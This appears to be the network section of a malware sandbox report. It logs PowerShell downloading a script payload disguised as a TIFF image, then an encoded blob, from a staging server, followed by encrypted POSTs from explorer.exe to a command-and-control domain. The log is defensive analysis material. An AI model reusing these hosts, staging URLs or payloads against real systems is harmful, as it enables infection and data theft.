Oct 23, 2024 08:14:50.375320911 CEST	53	63989	1.1.1.1	192.168.2.10
Oct 23, 2024 08:14:51.604723930 CEST	52665	53	192.168.2.10	1.1.1.1
Oct 23, 2024 08:14:51.612602949 CEST	53	52665	1.1.1.1	192.168.2.10
Oct 23, 2024 08:15:41.547200918 CEST	58459	53	192.168.2.10	1.1.1.1
Oct 23, 2024 08:15:41.789638996 CEST	53	58459	1.1.1.1	192.168.2.10

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 23, 2024 08:14:50.368208885 CEST	192.168.2.10	1.1.1.1	0x36e2	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Oct 23, 2024 08:14:51.604723930 CEST	192.168.2.10	1.1.1.1	0x1aaf	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false
Oct 23, 2024 08:15:41.547200918 CEST	192.168.2.10	1.1.1.1	0xab06	Standard query (0)	prolinice.ga	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Oct 23, 2024 08:14:50.375320911 CEST	1.1.1.1	192.168.2.10	0x36e2	No error (0)	drive.google.com	142.250.186.78	A (IP address)	IN (0x0001)	false
Oct 23, 2024 08:14:51.612602949 CEST	1.1.1.1	192.168.2.10	0x1aaf	No error (0)	drive.usercontent.google.com	142.250.185.193	A (IP address)	IN (0x0001)	false
Oct 23, 2024 08:15:41.789638996 CEST	1.1.1.1	192.168.2.10	0xab06	No error (0)	prolinice.ga	45.91.8.152	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

drive.usercontent.google.com

172.245.135.166

wvhejqgucymxstkj.com

prolinice.ga

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.10	49732	172.245.135.166	80	7848	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 08:14:43.411932945 CEST	329	OUT	GET /600/seethebestthingsentiretimewithgreatthignstoebe.tIF HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 172.245.135.166 Connection: Keep-Alive
Oct 23, 2024 08:14:44.091351986 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 06:14:43 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Tue, 22 Oct 2024 16:50:51 GMT ETag: "2251a-625139265a26b" Accept-Ranges: bytes Content-Length: 140570 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: image/tiff Data Raw: ff fe 70 00 72 00 69 00 76 00 61 00 74 00 65 00 20 00 66 00 75 00 6e 00 63 00 74 00 69 00 6f 00 6e 00 20 00 43 00 72 00 65 00 61 00 74 00 65 00 53 00 65 00 73 00 73 00 69 00 6f 00 6e 00 28 00 77 00 73 00 6d 00 61 00 6e 00 2c 00 20 00 63 00 6f 00 6e 00 53 00 74 00 72 00 2c 00 20 00 6f 00 70 00 74 00 44 00 69 00 63 00 2c 00 20 00 6d 00 61 00 73 00 63 00 75 00 6c 00 69 00 6e 00 69 00 64 00 61 00 64 00 65 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 68 00 79 00 70 00 6f 00 67 00 6c 00 6f 00 73 00 73 00 61 00 46 00 6c 00 61 00 67 00 73 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 63 00 6f 00 6e 00 4f 00 70 00 74 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 68 00 79 00 70 00 6f 00 67 00 6c 00 6f 00 73 00 73 00 61 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 61 00 75 00 74 00 68 00 56 00 61 00 6c 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 65 00 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 56 00 61 00 6c 00 [TRUNCATED] Data Ascii: private function CreateSession(wsman, conStr, optDic, masculinidade) dim hypoglossaFlags dim conOpt dim hypoglossa dim authVal dim encodingVal dim encryptVal dim pw dim tout ' proxy information dim proxyAccessType dim proxyAccessTypeVal dim proxyAuthenticationMechanism dim proxyAuthenticationMechanismVal dim proxyUsername dim proxyPassword hypoglossaFlags = 0 proxy
Oct 23, 2024 08:14:44.091387987 CEST	1236	IN	Data Raw: 00 41 00 63 00 63 00 65 00 73 00 73 00 54 00 79 00 70 00 65 00 20 00 3d 00 20 00 30 00 0d 00 0a 00 20 00 20 00 20 00 20 00 70 00 72 00 6f 00 78 00 79 00 41 00 63 00 63 00 65 00 73 00 73 00 54 00 79 00 70 00 65 00 56 00 61 00 6c 00 20 00 3d 00 20 Data Ascii: AccessType = 0 proxyAccessTypeVal = 0 proxyAuthenticationMechanism = 0 proxyAuthenticationMechanismVal = 0
Oct 23, 2024 08:14:44.091398954 CEST	424	IN	Data Raw: 00 28 00 65 00 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 56 00 61 00 6c 00 29 00 20 00 3d 00 20 00 22 00 75 00 74 00 66 00 2d 00 38 00 22 00 20 00 74 00 68 00 65 00 6e 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 Data Ascii: (encodingVal) = "utf-8" then hypoglossaFlags = hypoglossaFlags OR wsman.SessionFlagUTF8 else
Oct 23, 2024 08:14:44.091475010 CEST	24	IN	Data Raw: 00 22 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 65 Data Ascii: " e
Oct 23, 2024 08:14:44.091543913 CEST	1236	IN	Data Raw: 00 6e 00 64 00 20 00 69 00 66 00 0d 00 0a 00 20 00 20 00 20 00 20 00 65 00 6e 00 64 00 20 00 69 00 66 00 0d 00 0a 00 0d 00 0a 00 20 00 20 00 20 00 20 00 69 00 66 00 20 00 6f 00 70 00 74 00 44 00 69 00 63 00 2e 00 41 00 72 00 67 00 75 00 6d 00 65 Data Ascii: nd if end if if optDic.ArgumentExists(NPARA_UNENCRYPTED) then ASSERTBOOL optDic.ArgumentExists(NPARA
Oct 23, 2024 08:14:44.091553926 CEST	212	IN	Data Raw: 00 6c 00 61 00 67 00 73 00 20 00 4f 00 52 00 20 00 77 00 73 00 6d 00 61 00 6e 00 2e 00 53 00 65 00 73 00 73 00 69 00 6f 00 6e 00 46 00 6c 00 61 00 67 00 55 00 73 00 65 00 53 00 73 00 6c 00 0d 00 0a 00 20 00 20 00 20 00 20 00 65 00 6e 00 64 00 20 Data Ascii: lags OR wsman.SessionFlagUseSsl end if if optDic.ArgumentExists(NPARA_AUTH) then AS
Oct 23, 2024 08:14:44.091566086 CEST	1236	IN	Data Raw: 00 53 00 45 00 52 00 54 00 4e 00 41 00 4c 00 28 00 4e 00 50 00 41 00 52 00 41 00 5f 00 41 00 55 00 54 00 48 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 61 00 75 00 74 00 68 00 56 00 61 00 6c 00 20 00 3d 00 20 00 6f 00 70 Data Ascii: SERTNAL(NPARA_AUTH) authVal = optDic.Argument(NPARA_AUTH) select case LCase(authVal) case
Oct 23, 2024 08:14:44.091578007 CEST	212	IN	Data Raw: 00 61 00 6c 00 69 00 64 00 20 00 66 00 6f 00 72 00 20 00 27 00 2d 00 61 00 75 00 74 00 68 00 3a 00 6e 00 6f 00 6e 00 65 00 27 00 22 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 63 00 61 00 73 00 65 00 20 Data Ascii: alid for '-auth:none'" case VAL_BASIC 'Use -username and -password.
Oct 23, 2024 08:14:44.091753960 CEST	1236	IN	Data Raw: 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 41 00 53 00 53 00 45 00 52 00 54 00 42 00 4f 00 4f 00 4c 00 20 00 6f 00 70 00 74 00 44 00 69 00 63 00 2e 00 41 00 72 00 67 00 75 00 6d 00 65 00 6e 00 74 00 45 00 78 00 69 00 73 Data Ascii: ASSERTBOOL optDic.ArgumentExists(NPARA_USERNAME), "The '-" & NPARA_USERNAME & "' option must be specified for
Oct 23, 2024 08:14:44.091764927 CEST	212	IN	Data Raw: 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 41 00 53 00 53 00 45 00 52 00 54 00 42 00 4f 00 4f 00 4c 00 20 00 6e 00 6f 00 74 00 20 00 6f 00 70 00 74 00 44 00 69 00 63 00 2e 00 41 00 72 00 67 00 75 00 6d 00 65 00 6e 00 74 00 45 Data Ascii: ASSERTBOOL not optDic.ArgumentExists(NPARA_CERT), "The '-" & NPARA_CERT & "' option is not valid
Oct 23, 2024 08:14:44.096703053 CEST	1236	IN	Data Raw: 00 20 00 66 00 6f 00 72 00 20 00 27 00 2d 00 61 00 75 00 74 00 68 00 3a 00 64 00 69 00 67 00 65 00 73 00 74 00 27 00 22 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 68 00 79 00 70 Data Ascii: for '-auth:digest'" hypoglossaFlags = hypoglossaFlags OR wsman.SessionFlagCredUsernamePassword OR wsman

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.10	49913	172.245.135.166	80	6124	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 08:15:16.403307915 CEST	79	OUT	GET /600/ERFCEE.txt HTTP/1.1 Host: 172.245.135.166 Connection: Keep-Alive
Oct 23, 2024 08:15:17.064065933 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 06:15:16 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Tue, 22 Oct 2024 16:48:03 GMT ETag: "c558-625138867f6e1" Accept-Ranges: bytes Content-Length: 50520 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/plain Data Raw: 3d 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [TRUNCATED] Data Ascii: ==AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Oct 23, 2024 08:15:17.064143896 CEST	224	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Oct 23, 2024 08:15:17.064153910 CEST	1236	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Oct 23, 2024 08:15:17.064184904 CEST	212	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Oct 23, 2024 08:15:17.064248085 CEST	1236	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Oct 23, 2024 08:15:17.064295053 CEST	1236	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Oct 23, 2024 08:15:17.064316034 CEST	1236	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Oct 23, 2024 08:15:17.064446926 CEST	1236	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Oct 23, 2024 08:15:17.064459085 CEST	848	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Oct 23, 2024 08:15:17.064471006 CEST	1236	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Oct 23, 2024 08:15:17.070723057 CEST	1236	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.10	49980	45.91.8.152	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 08:15:41.796554089 CEST	282	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://wvhejqgucymxstkj.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 136 Host: prolinice.ga
Oct 23, 2024 08:15:41.796554089 CEST	136	OUT	Data Raw: 6e e2 e1 8b c3 47 f5 12 1a 17 b3 17 3d 2c f9 f3 a5 20 e8 24 45 f8 cc e2 f4 e8 04 6b d8 3b 46 00 35 b9 eb b0 0c ac f4 a2 12 be c4 f2 87 a1 2e 58 95 24 5d 48 8c 38 2e e3 36 d6 88 68 45 d7 76 e0 a7 3a bc 52 ee cc 59 3b 1f d6 b3 50 4c 85 11 b4 f5 ab Data Ascii: nG=, $Ek;F5.X$]H8.6hEv:RY;PL4>Wwg5}VHHO0U^=li#SC/q
Oct 23, 2024 08:15:42.990777969 CEST	1236	IN	HTTP/1.1 404 Not Found date: Wed, 23 Oct 2024 06:15:42 GMT server: Apache/2.4.59 (Debian) transfer-encoding: chunked content-type: text/html; charset=utf-8 Data Raw: 33 37 44 33 0d 0a 84 00 00 00 a0 5f e8 0a 27 e8 d3 d3 81 21 79 b3 53 e5 35 0b ec 13 ad 26 4d 93 dc e5 25 0a ed e2 44 4a 3b 47 a5 77 e3 2c 25 29 67 7b b4 1d 52 9a 46 7a 54 8c 7e 72 ec d5 7e f4 44 cf b3 6b eb a7 41 63 d4 4a be ec 6e e8 4b 42 15 65 fa 28 3b 12 b5 17 01 51 60 01 78 3a 91 7f 32 8b 47 78 ce d5 ea f0 7b d0 1e 45 fe 16 dc 84 fa d9 be 93 bd db 4a 1d 9f ac 79 dd 2f b5 84 79 6d 21 b3 90 51 dc c2 a5 14 5d bd 12 b6 4b 00 ca 2c 05 00 7c e1 f7 57 09 03 02 00 09 00 9e 03 00 00 53 1f 7d 22 77 32 62 71 76 3f 4f 55 52 12 42 00 c9 32 ee 68 fe 0f ca 76 74 07 d6 d6 f9 b8 92 29 e8 55 92 92 3e c8 50 dd 24 a4 99 ce 5c 90 b9 3b fc 51 49 c0 0d f0 19 d3 e9 92 2a 7a f7 09 00 bb 7a b8 01 84 b7 a3 64 8b 0b f3 9f 79 57 fa 26 ce 46 fb 76 8c c7 a7 e0 22 d1 2d c9 1e 43 c3 ef c1 4c dd a0 af 3d b8 a8 a5 fb c0 70 8e 98 0e df 4b cc 40 42 f2 70 5e a2 6b 51 b2 9f 66 73 fe c7 15 ac cd f6 9d 88 6a 44 07 1e 8d 8b 6b 24 18 2b 4b 2a ec 81 b7 50 50 a4 4e ad cf 32 5c c0 15 b4 57 90 1b 0d ee 6c f7 54 23 c9 ed 8e bc 36 a0 b4 7a c0 [TRUNCATED] Data Ascii: 37D3_'!yS5&M%DJ;Gw,%)g{RFzT~r~DkAcJnKBe(;Q`x:2Gx{EJy/ym!Q]K,\|WS}"w2bqv?OURB2hvt)U>P$\;QIzzdyW&Fv"-CL=pK@Bp^kQfsjDk$+KPPN2\WlT#6zbRKZ :D?UkKc'O?i@i3E\| [}S2TqL L7@x!FEx{4@h;pg_Q@[N2H%s;"r21LVRvo9bN\|P,ds,^L+j m.&>g!=/r:l_U*kH >(OAO\|q;@+o%Snnq nU[f&C5GT] T]>g{v[ySzB8IX<\r}23:=;HX>H+exij=Ou`'p3\|JY=R^Xo[#kn^T-la@9>$z\|kXv6]O8Rp\|otzAY2u-jk75HwbEIrBG`yDvWR0md9n/oc$7;KC?iT6cTD/m#R\|~YrM [TRUNCATED]
Oct 23, 2024 08:15:42.990807056 CEST	1236	IN	Data Raw: 3a 4a 46 78 d9 bd c0 47 06 63 a2 e7 43 6c 5f a3 5c e6 3f 2b e2 a7 6d 88 36 d1 ab 7a 33 cd e9 51 55 b8 03 fb 2e 0d 79 6a 86 6c 78 60 5a 8e 07 2c 38 79 4f 36 32 6e 72 7e f0 72 29 40 6c 3b 69 dd ad e7 19 f3 32 10 e2 c9 8b d5 e5 cc ae ac cf 2c b2 0d Data Ascii: :JFxGcCl_\?+m6z3QU.yjlx`Z,8yO62nr~r)@l;i2,!a'MyPXN_k0aW,xqWbsevmBH,c:l%TM007#1<?ye-gtgcwmV`&$E^uAwI0q:<
Oct 23, 2024 08:15:42.990824938 CEST	1236	IN	Data Raw: 86 fd 09 d8 a2 56 03 b9 bb 52 d2 5a 38 70 92 0a 6f 3e 66 10 29 91 14 e3 c8 e6 94 a8 a4 07 12 25 68 3e 18 de c7 0a 45 28 0f 3d 2b 64 16 02 7e ff 0f a4 b4 58 7b 10 00 8c 05 3f 8c c3 7c 9e 9b 4b 8c 69 a9 30 18 17 8f bb 36 dc 07 61 13 4b 73 3d b9 6c Data Ascii: VRZ8po>f)%h>E(=+d~X{?\|Ki06aKs=l?D7D;z6UM"iI"dioztH*{XgQlF}7u\C7:,#4QBGg 6!D6w\)85/QN\|wn2+w
Oct 23, 2024 08:15:42.991014957 CEST	636	IN	Data Raw: 70 7a 85 27 8f 78 0d 7a ea be c2 6f cb e2 76 e4 97 a3 c9 96 89 91 ea 3a 3f 38 2c 65 17 f7 0f 58 91 00 4f 5c d5 5b d5 e7 e3 a4 79 62 2a d3 08 62 f3 d5 fa 87 d5 e0 9e f7 7d 8b df 15 4a 12 a3 bd c2 70 b0 da 11 e2 ed 3e 8c be ec 80 d9 8a 8b 30 2b a0 Data Ascii: pz'xzov:?8,eXO\[ybb}Jp>0+;8-hg=hYQIHI,%07?b{Kk'BS\kV#vBc)xB6jX`#Qb'}T^^bn}vfau)Nr)<h/Dgq`?\|lD~c^%
Oct 23, 2024 08:15:42.991033077 CEST	1236	IN	Data Raw: 51 23 b0 7b 33 c9 fd 79 9a a6 18 e3 91 1b a0 6e 82 a5 b8 88 82 53 1c 14 4f 5b 01 31 e7 6d 82 e4 55 5b de a4 e2 46 ce 13 f0 19 82 6e e9 44 35 47 af 75 f0 c8 bd 5d ac a3 ff 35 a9 bd ef 0a 49 c2 1c 95 c9 e7 ac 95 ab f8 c7 34 c9 97 34 a6 36 ce 46 88 Data Ascii: Q#{3ynSO[1mU[FnD5Gu]5I446Fdhj9Aw)-?Uu^qrP0>ZWPH{{X.Dbd<N;}cHI3},[>q]Sz2[2"eULE{)S\fL5
